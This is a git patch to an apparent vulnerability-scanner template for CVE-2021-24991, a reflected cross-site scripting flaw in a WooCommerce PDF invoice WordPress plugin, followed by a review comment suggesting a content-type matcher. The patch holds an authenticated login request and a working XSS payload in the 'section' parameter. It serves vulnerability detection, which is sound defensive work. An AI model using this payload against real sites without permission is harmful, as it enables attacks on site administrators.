From 4fea6b14f49ff7067cede5ed8c9a369c8823f8e1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:42:32 +0530
Subject: [PATCH] Update CVE-2021-24991.yaml
---
 cves/2021/CVE-2021-24991.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-24991.yaml b/cves/2021/CVE-2021-24991.yaml
index e4634309d9..8be68cf940 100644
--- a/cves/2021/CVE-2021-24991.yaml
+++ b/cves/2021/CVE-2021-24991.yaml
@@ -6,7 +6,7 @@ info:
 severity: medium
 description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
 reference:
- - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
 - https://nvd.nist.gov/vuln/detail/CVE-2021-24991
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
@@ -27,7 +27,7 @@ requests:
 log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 - |
- GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
 Host: {{Hostname}}
 cookie-reuse: true
@@ -36,10 +36,10 @@ requests:
 - type: word
 part: body
 words:
- - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
 - "WooCommerce PDF Invoices"
 condition: and
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
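Review bot: The matchers in the last hunk (`@@ -36,10 +36,10 @@`) accept any 200 response whose body contains the reflected string and the plugin name, but nothing visible checks that the response is served as HTML. A reflection in a non-HTML response would therefore be reported as XSS, which costs triage time on a medium-severity finding. A header matcher for `text/html` alongside the body and status matchers would close that false-positive class. The `matchers:` key and any `matchers-condition` sit above the hunk, so this assumes no header check exists there and that the matchers are combined with `and`; the indentation below is illustrative because the page has lost the file's own.

```yaml
    # … unchanged: body word matcher and status matcher …
      - type: word
        part: header
        words:
          - text/html
```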